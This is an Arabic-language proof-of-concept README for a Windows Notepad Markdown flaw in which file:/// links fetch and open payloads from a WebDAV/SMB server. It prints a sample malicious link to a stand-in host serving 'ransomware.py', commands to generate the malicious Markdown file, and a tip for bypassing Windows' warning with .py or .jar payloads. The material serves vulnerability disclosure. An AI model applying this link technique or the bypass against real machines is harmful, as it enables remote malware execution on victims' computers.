
PoC لثغرة «Windows Notepad RCE»
PoC لثغرة "Windows Notepad RCE".
"الثغرة" بسيطة. محرك Markdown في Windows Notepad لا يبالي ببروتوكولات عناوين URL غير المألوفة. بوصفي محلل برمجيات خبيثة، قرأتُ تقارير عديدة عن نشر الحمولات عبر WebDAV وSMB. من خلال هذا المستند، يمكن إساءة استخدام بروتوكول file:/// وإنشاء عنوان URL يشير إلى ملف على خادم WebDAV/SMB.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
لقد أعددت نصين برمجيين: أحدهما بلغة Node.js والآخر بلغة Python. كلاهما ينشئ ملف Markdown يشير إلى حمولة WebDAV. يمكنك استخدام الحمولات النموذجية في مجلد sample-payloads.
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
سيظهر الملف الناتج (poc.md) في الدليل الحالي.
معظم امتدادات ملفات الحمولة (مثل .exe و.lnk و.vbs، ...) ستظل تؤدي إلى ظهور تحذير مدمج على الرغم من أن تطبيق Notepad معرّض للثغرة. يأتي التحذير من Windows نفسه. على الأقل كل ما اختبرته مما يمكن أن يؤدي إلى تنفيذ تعليمات برمجية على تثبيت افتراضي خارج الصندوق (OOB) يُظهر هذا التحذير الإلزامي.

إذا كان الجهاز المستهدف يحتوي على Python أو Java مثبتًا، يمكنك استخدام حمولة بامتداد .py أو .jar لتجاوز نافذة التحذير المنبثقة.

النقر على الرابط الآن يعرض نافذة تحذير منبثقة جديدة.
يمكنك العثور على نسخة Windows Notepad المعرّضة للثغرة من Uptodown. تذكر التحقق من التوقيع الرقمي للمثبّت والتأكد من أنه من Microsoft. كما ينبغي اختبار هذا الـ PoC داخل جهاز افتراضي فقط.
ابقوا آمنين واستمتعوا!